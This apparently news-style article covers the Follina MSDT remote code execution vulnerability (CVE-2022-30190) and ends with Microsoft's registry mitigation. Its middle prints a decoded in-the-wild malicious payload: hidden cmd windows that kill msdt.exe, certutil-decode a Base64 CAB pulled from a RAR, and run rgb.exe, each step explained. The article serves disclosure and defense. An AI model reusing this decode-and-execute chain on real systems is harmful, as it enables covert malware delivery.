The Microsoft Windows Support Diagnostic Tool (MSDT) for Windows has been exposed to a high-risk 0day vulnerability, codenamed “Follina,” that could be used to remotely execute code on Windows systems.

The vulnerability was first discovered and reported to Microsoft by a Shadow Chaser Group researcher in April, and proved to have been exploited by hackers in an attack. The researcher said Microsoft initially marked the vulnerability as not a “security-related issue”, but later closed the vulnerability submission report citing the existence of a remote code execution vulnerability. As a result, the long-discovered vulnerability has only recently been marked with the number: CVE-2022-30190.

Microsoft’s description of this vulnerability is as follows.

“A remote code execution vulnerability exists when invoking MSDT from a calling application such as Word using the URL protocol. An attacker who successfully exploited this vulnerability could run arbitrary code with the privileges of the calling application. The attacker could then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s permissions.”

According to researcher Kevin Beaumont’s analysis, the document containing the attack vector uses Word to retrieve an HTML file from a remote Web server. The document then uses an MSProtocol URI scheme to load and execute PowerShell commands. While this is theoretically unlikely, it is in fact possible. When the commands in the document are decoded, they are converted to

1
2
3
4
5
6
7

$cmd ="c:\Windows\system32\cmd.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList"/c taskkill /f /im msdt.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList"/c cd C:\users\public\&&for /r

%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

The script is implemented as follows.

Run the following actions in a hidden window

  1. if msdt.exe is running, terminate it
  2. loop through the files in the RAR file to find the Base64 string encoding the CAB file
  3. store this Base64-encoded CAB file as 1.t
  4. decode the Base64-encoded CAB file and save it as 1.c
  5. Expand the 1.c CAB file to the current directory, and finally.
  6. execute rgb.exe

word

Microsoft has not yet released a patch to fix this vulnerability, but provides a mitigation to disable the MSDT URL protocol:

  1. Run the command prompt as administrator
  2. To back up registry entries, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename”
  3. execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”